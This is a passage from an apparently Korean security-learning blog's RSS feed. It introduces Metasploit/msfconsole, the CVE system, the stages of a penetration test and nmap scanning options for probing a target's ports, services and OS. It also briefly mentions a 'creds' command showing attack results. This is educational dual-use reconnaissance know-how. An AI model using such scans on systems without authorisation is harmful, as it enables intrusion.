data-origin-height=&quot;342&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;creds 명령어로 공격 결과를 확인할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Kali Linux</category>
      <author>Pulseeee</author>
      <guid isPermaLink="true">https://it-mandarine.tistory.com/69</guid>
      <comments>https://it-mandarine.tistory.com/69#entry69comment</comments>
      <pubDate>Wed, 8 Feb 2023 19:31:28 +0900</pubDate>
    </item>
    <item>
      <title>msfconsole와 모의 해킹 프로세스</title>
      <link>https://it-mandarine.tistory.com/68</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;msfconsole&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. Metasploit : CVE 넘버링이 붙은 알려진 취약점 공격을 사용할 수 있도록 제공되는 도구로 해킹을 편하게 하도록 도와주는 모의해킹 테스트 도구이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;※ CVE : Common Vulnerabilities and Exposure 공개적으로 알려진 소프트웨어 보안 취약점을 가리키는 고유 표기이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. 특징&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;1) 정보 수집, 공격(Exploit), 공격에 사용되는 Plugin(payload) 등으로 구성된 도구&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;2) 외부 모듈인 취약점 점검, 포트 스캐너 등의 사용이 가능하고 DB저장이 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;3) 정보 수집 및 공격 모듈 사용 시 간편하게 진행 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;4) msfconsole 내에서 외부 명령어(리눅스 명령어) 사용 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;5) 리눅스에서 실행하는 공격 툴 관련 싱행 내용들을 Metaploit에서 실행하여 결과를 저장 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;모의 해킹 프로세스&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;모의 해킹 프로세스의 단계로는&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;0. 사전협의 단계&lt;br /&gt;1. 정보수집 단계&lt;br /&gt;2. 취약점분석 단계&lt;br /&gt;3. 침투 단계&lt;br /&gt;4. 대응방안 수입, 보고서 작성 로 나누어 진다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;정보 수집 단계는 수동적인 정보 수집과 능동적인 정보 수집으로 나누어 진다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;수동적인 정보 수집은 구글, 네이버 등과 같은 검색으로 정보를 수집한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;능동적인 정보 수집은 DNS 정보 조회(dig 또는 칼리리눅스를 사용), Host 정보 조회, Network (L3, L4 Port)정보를 수집한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;칼리리눅스 nmap 명령어를 이용하여 공격 대상 PC의 포트 개방 여부 OS, 프로토콜의 버전등의 정보수집을 할 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;ex) nmap [옵션]&amp;nbsp; [포트번호] [공격 대상 IP]&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;옵션 : -p (조회할 포트번호) -sT (TCP포트), -sU (UDP포트), -sV (버전정보), -O (공격 대상 PC의 OS정보), --reason(질의응답)&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;포트는 열려있지만 7계층이 닫혀있는 1011 상태.PNG&quot; data-origin-width=&quot;576&quot; data-origin-height=&quot;411&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/colRqE/btrYyVf50qE/Sesk8cQbSFYVru4dOrkZf1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/colRqE/btrYyVf50qE/Sesk8cQbSFYVru4dOrkZf1/img.png&quot; data-alt=&quot;--reason 옵션으로 7계층의 open여부를 확인 할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/colRqE/btrYyVf50qE/Sesk8cQbSFYVru4dOrkZf1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcolRqE%2FbtrYyVf50qE%2FSesk8cQbSFYVru4dOrkZf1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;576&quot; height=&quot;411&quot; data-filename=&quot;포트는 열려있지만 7계층이 닫혀있는 1011 상태.PNG&quot; data-origin-width=&quot;576&quot; data-origin-height=&quot;411&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;--reason 옵션으로 7계층의 open여부를 확인 할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;각각 프로토콜이 몇버전에의해서 실행되고있는지 확인.PNG&quot; data-origin-width=&quot;879&quot; data-origin-height=&quot;443&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ldvS3/btrYzErqbFT/WWzx0BIKdpy4UkRLuAbfVk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ldvS3/btrYzErqbFT/WWzx0BIKdpy4UkRLuAbfVk/img.png&quot; data-alt=&quot;프로토콜의 버전 정보 출력&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ldvS3/btrYzErqbFT/WWzx0BIKdpy4UkRLuAbfVk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FldvS3%2FbtrYzErqbFT%2FWWzx0BIKdpy4UkRLuAbfVk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;879&quot; height=&quot;443&quot; data-filename=&quot;각각 프로토콜이 몇버전에의해서 실행되고있는지 확인.PNG&quot; data-origin-width=&quot;879&quot; data-origin-height=&quot;443&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;프로토콜의 버전 정보 출력&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;OS정보도 출력.PNG&quot; data-origin-width=&quot;900&quot; data-origin-height=&quot;563&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bBwNSh/btrYwnKLvwd/AqNNxDo8PShJ6kMQGP99U0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bBwNSh/btrYwnKLvwd/AqNNxDo8PShJ6kMQGP99U0/img.png&quot; data-alt=&quot;OS 출력&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bBwNSh/btrYwnKLvwd/AqNNxDo8PShJ6kMQGP99U0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbBwNSh%2FbtrYwnKLvwd%2FAqNNxDo8PShJ6kMQGP99U0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;900&quot; height=&quot;563&quot; data-filename=&quot;OS정보도 출력.PNG&quot; data-origin-width=&quot;900&quot; data-origin-height=&quot;563&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;OS 출력&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Kali Linux</category>
      <author>Pulseeee</author>
      <guid isPermaLink="true">https://it-mandarine.tistory.com/68</guid>
      <comments>https://it-mandarine.tistory.com/68#entry68comment</comments>
      <pubDate>Wed, 8 Feb 2023 19:24:17 +0900</pubDate>
    </item>
  </channel>
</rss>